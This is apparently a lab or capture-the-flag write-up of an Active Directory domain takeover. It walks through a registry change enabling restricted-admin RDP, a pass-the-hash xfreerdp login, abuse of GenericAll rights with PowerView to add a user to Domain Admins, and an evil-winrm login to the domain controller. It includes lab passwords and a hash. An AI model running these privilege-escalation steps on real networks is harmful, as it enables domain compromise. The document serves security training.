Credentials Obtained

Now we have another set of credentials for use CT059 who has GenericAll right to Domain Admins group!

I tried many times to run runas as CT059 but the prompt to get a password wouldn't work in CLI. I tried using evil-winrm, psexec, meterpreter they all fail. So I had to connect to MS01 with freerdp to get a GUI to the desktop.

While on psexec we first need to make MS01 to unrestrict RDP. Without running this first we'll get an error message at logon.

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Before running this through SSH make sure to add -X option when SSHing

xfreerdp /v:172.16.7.50 /u:Administrator /pth:bdaffbfe64f1fc646a3353be1c2c3c99

For me, the RDP didn't run very well. It was super slow and I couldn't make it to register a single mouse click. So I decided to just stick to CLI.

We can still abuse the GenericAll right to add a user into the Domain Admin group.

Get-DomainGroupMember -Identity "Domain Admins"

Here I chose AB920 because it has a very simple password.

$SecPassword = ConvertTo-SecureString 'weasal' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\AB920', $SecPassword)

Import-Module PowerView.ps1
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'AB920' -Credential $Cred

Get-DomainGroupMember -Identity 'Domain Admins'

Lets login to DC01 as AB920 now and get the flag from DC01:

evil-winrm -i 172.16.7.3 -u AB920 -p weasal